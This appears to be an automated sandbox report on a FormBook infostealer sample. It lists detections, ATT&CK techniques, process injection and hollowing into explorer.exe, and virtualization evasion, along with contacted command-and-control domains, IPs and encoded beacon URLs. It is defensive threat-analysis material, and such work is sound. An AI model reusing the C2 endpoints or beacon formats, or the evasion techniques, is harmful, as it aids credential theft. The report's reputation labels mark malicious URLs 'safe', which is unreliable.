          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452473 Sample: NQBNpLezqZKv1P4.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 31 www.fbgroupsmadesimple.com 2->31 33 fbgroupsmadesimple.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 3 other signatures 2->47 11 NQBNpLezqZKv1P4.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...29QBNpLezqZKv1P4.exe.log, ASCII 11->29 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 NQBNpLezqZKv1P4.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.boicity.com 156.241.53.21, 49763, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->35 37 www.sh-zzjy.com 156.241.53.248, 49766, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->37 39 7 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Uses netstat to query active network connections and open ports 18->51 22 NETSTAT.EXE 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NQBNpLezqZKv1P4.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.zhongyicts.com.cnue0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/ct0%Avira URL Cloudsafe
          http://www.sandoll.co.krbl0%Avira URL Cloudsafe
          http://www.zrcezzfdfkyjlir.com/4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.goodfont.co.krklJ0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnUc0%Avira URL Cloudsafe
          http://www.carterandcone.comen0%URL Reputationsafe
          http://www.carterandcone.comen0%URL Reputationsafe
          http://www.carterandcone.comen0%URL Reputationsafe
          http://www.iafzal.com/4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          www.extraclass.xyz/4nn8/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.nirvananaturalcbd.net/4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.carterandcone.comroa0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.founder.com.cn/cnAc0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.sh-zzjy.com/4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.tiro.comicFf0%Avira URL Cloudsafe
          http://www.carterandcone.comR0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr.kr0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://fontfabrik.comp0%Avira URL Cloudsafe
          http://www.sajatypeworks.coml0%Avira URL Cloudsafe
          http://www.fbgroupsmadesimple.com/4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.goodfont.co.krylx0%Avira URL Cloudsafe
          http://www.boicity.com/4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.tiro.comicwf0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP960%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://fontfabrik.com(0%Avira URL Cloudsafe
          http://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.sandoll.co.kr8l0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com
          		46.137.146.55
          		truetrue
            		unknown
            iafzal.com
            		184.168.131.241
            		truetrue
              		unknown
              www.nirvananaturalcbd.net
              		104.143.9.211
              		truetrue
                		unknown
                www.boicity.com
                		156.241.53.21
                		truetrue
                  		unknown
                  www.zrcezzfdfkyjlir.com
                  		199.34.228.66
                  		truetrue
                    		unknown
                    fbgroupsmadesimple.com
                    		184.168.131.241
                    		truetrue
                      		unknown
                      www.sh-zzjy.com
                      		156.241.53.248
                      		truetrue
                        		unknown
                        www.fbgroupsmadesimple.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.iafzal.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.updates-app.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.zrcezzfdfkyjlir.com/4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.iafzal.com/4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.extraclass.xyz/4nn8/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.nirvananaturalcbd.net/4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sh-zzjy.com/4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fbgroupsmadesimple.com/4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.boicity.com/4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.zhongyicts.com.cnueNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/ctNQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sandoll.co.krblNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krklJNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cnUcNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://api.twitter.com/1/direct_messages.xml?since_id=NQBNpLezqZKv1P4.exefalse
                                      		high
                                      http://www.carterandcone.comenNQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tiro.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.carterandcone.comroaNQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.goodfont.co.krexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://twitter.com/statuses/user_timeline.xml?screen_name=NQBNpLezqZKv1P4.exefalse
                                          		high
                                          http://www.carterandcone.comNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnAcNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.tiro.comicFfNQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
